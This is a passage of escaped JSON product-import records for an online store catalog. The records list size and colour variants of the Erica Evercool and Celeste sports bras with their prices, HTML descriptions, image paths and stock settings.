":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Yellow\"},\"1570\":{\"sku\":\"WB02-XL-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Erica Evercool Sports Bra-XL-Blue\",\"description\":\"<p>Perfect for medium-impact workouts, our Erica EverCool&trade; Sports Bra brings a brilliant combo of comfort and style. Moisture-wicking technology keeps you dry, and the flattering hybrid racerback promises an unbeatable range of motion.<\\/p>\\n<p>&bull; Honeycomb light blue bra top.<br \\/>&bull; Elastic hem.<br \\/>&bull; Reinforced binding. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"erica-evercool-sports-bra-xl-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb02-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb02-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb02-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/b\\/wb02-blue_alt1.jpg,\\/w\\/b\\/wb02-blue_back.jpg\",\"image\":\"\\/w\\/b\\/wb02-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb02-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/b\\/wb02-blue_alt1.jpg,\\/w\\/b\\/wb02-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Blue\"},\"1571\":{\"sku\":\"WB02-XL-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Erica Evercool Sports Bra-XL-Orange\",\"description\":\"<p>Perfect for medium-impact workouts, our Erica EverCool&trade; Sports Bra brings a brilliant combo of comfort and style. Moisture-wicking technology keeps you dry, and the flattering hybrid racerback promises an unbeatable range of motion.<\\/p>\\n<p>&bull; Honeycomb light blue bra top.<br \\/>&bull; Elastic hem.<br \\/>&bull; Reinforced binding. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"erica-evercool-sports-bra-xl-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb02-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb02-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb02-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/b\\/wb02-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb02-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Orange\"},\"1572\":{\"sku\":\"WB02-XL-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Erica Evercool Sports Bra-XL-Yellow\",\"description\":\"<p>Perfect for medium-impact workouts, our Erica EverCool&trade; Sports Bra brings a brilliant combo of comfort and style. Moisture-wicking technology keeps you dry, and the flattering hybrid racerback promises an unbeatable range of motion.<\\/p>\\n<p>&bull; Honeycomb light blue bra top.<br \\/>&bull; Elastic hem.<br \\/>&bull; Reinforced binding. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"erica-evercool-sports-bra-xl-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb02-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb02-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb02-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/b\\/wb02-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb02-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Yellow\"},\"1573\":{\"sku\":\"WB02\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks\",\"product_websites\":\"base\",\"name\":\"Erica Evercool Sports Bra\",\"description\":\"<p>Perfect for medium-impact workouts, our Erica EverCool&trade; Sports Bra brings a brilliant combo of comfort and style. Moisture-wicking technology keeps you dry, and the flattering hybrid racerback promises an unbeatable range of motion.<\\/p>\\n<p>&bull; Honeycomb light blue bra top.<br \\/>&bull; Elastic hem.<br \\/>&bull; Reinforced binding. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb02-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb02-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb02-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Bra,material=EverCool&trade;|Lycra&reg;,pattern=Solid,climate=Indoor|Warm,eco_collection=No,performance_fabric=No,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WB02-XS-Blue,size=XS,color=Blue|sku=WB02-XS-Orange,size=XS,color=Orange|sku=WB02-XS-Yellow,size=XS,color=Yellow|sku=WB02-S-Blue,size=S,color=Blue|sku=WB02-S-Orange,size=S,color=Orange|sku=WB02-S-Yellow,size=S,color=Yellow|sku=WB02-M-Blue,size=M,color=Blue|sku=WB02-M-Orange,size=M,color=Orange|sku=WB02-M-Yellow,size=M,color=Yellow|sku=WB02-L-Blue,size=L,color=Blue|sku=WB02-L-Orange,size=L,color=Orange|sku=WB02-L-Yellow,size=L,color=Yellow|sku=WB02-XL-Blue,size=XL,color=Blue|sku=WB02-XL-Orange,size=XL,color=Orange|sku=WB02-XL-Yellow,size=XL,color=Yellow\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/b\\/wb02-blue_alt1.jpg,\\/w\\/b\\/wb02-blue_back.jpg\",\"image\":\"\\/w\\/b\\/wb02-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb02-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/b\\/wb02-blue_alt1.jpg,\\/w\\/b\\/wb02-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Bra\",\"material\":\"EverCool&trade;|Lycra&reg;\",\"pattern\":\"Solid\",\"climate\":\"Indoor|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"1574\":{\"sku\":\"WB03-XS-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Celeste Sports Bra-XS-Green\",\"description\":\"<p>Whatever your goals for the day\'s workout, the Celeste Sports Bra lets you do it in comfort and coolness, plus enhanced support and shaping. A power mesh back zone and moisture-wicking fabric ensure you stay dry.<\\/p>\\n<p>&bull; Mint bra top. <br \\/>&bull; Seam-free interior molded cups<br \\/>&bull; Odor control. <br \\/>&bull; UV protection. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"celeste-sports-bra-xs-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb03-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb03-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb03-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/b\\/wb03-green_alt1.jpg,\\/w\\/b\\/wb03-green_back.jpg\",\"image\":\"\\/w\\/b\\/wb03-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb03-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/b\\/wb03-green_alt1.jpg,\\/w\\/b\\/wb03-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Green\"},\"1575\":{\"sku\":\"WB03-XS-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Celeste Sports Bra-XS-Red\",\"description\":\"<p>Whatever your goals for the day\'s workout, the Celeste Sports Bra lets you do it in comfort and coolness, plus enhanced support and shaping. A power mesh back zone and moisture-wicking fabric ensure you stay dry.<\\/p>\\n<p>&bull; Mint bra top. <br \\/>&bull; Seam-free interior molded cups<br \\/>&bull; Odor control. <br \\/>&bull; UV protection. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"celeste-sports-bra-xs-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb03-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb03-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb03-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/b\\/wb03-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb03-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Red\"},\"1576\":{\"sku\":\"WB03-XS-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Celeste Sports Bra-XS-Yellow\",\"description\":\"<p>Whatever your goals for the day\'s workout, the Celeste Sports Bra lets you do it in comfort and coolness, plus enhanced support and shaping. A power mesh back zone and moisture-wicking fabric ensure you stay dry.<\\/p>\\n<p>&bull; Mint bra top. <br \\/>&bull; Seam-free interior molded cups<br \\/>&bull; Odor control. <br \\/>&bull; UV protection. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"celeste-sports-bra-xs-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb03-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb03-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb03-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/b\\/wb03-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb03-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Yellow\"},\"1577\":{\"sku\":\"WB03-S-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Celeste Sports Bra-S-Green\",\"description\":\"<p>Whatever your goals for the day\'s workout, the Celeste Sports Bra lets you do it in comfort and coolness, plus enhanced support and shaping. A power mesh back zone and moisture-wicking fabric ensure you stay dry.<\\/p>\\n<p>&bull; Mint bra top. <br \\/>&bull; Seam-free interior molded cups<br \\/>&bull; Odor control. <br \\/>&bull; UV protection. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"celeste-sports-bra-s-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/b\\/wb03-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/b\\/wb03-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/b\\/wb03-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/b\\/wb03-green_alt1.jpg,\\/w\\/b\\/wb03-green_back.jpg\",\"image\":\"\\/w\\/b\\/wb03-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/b\\/wb03-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/b\\/wb03-green_alt1.jpg,\\/w\\/b\\/wb03-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Green\"},\"1578\":{\"sku\":\"WB03-S-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Celeste Sports Bra-S-Red\",\"description\":\"<p>Whatever your goals for the day\'s workout, the Celeste Sports Bra lets you do it in comfort and coolness, plus enhanced support and shaping. A power mesh back zone and moisture-wicking fabric ensure you stay dry.<\\/p>\\n<p>&bull; Mint bra top. <br \\/>&bull; Seam-free interior molded cups<br \\/>&bull; Odor control. <br \\/>&bull; UV protection. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible 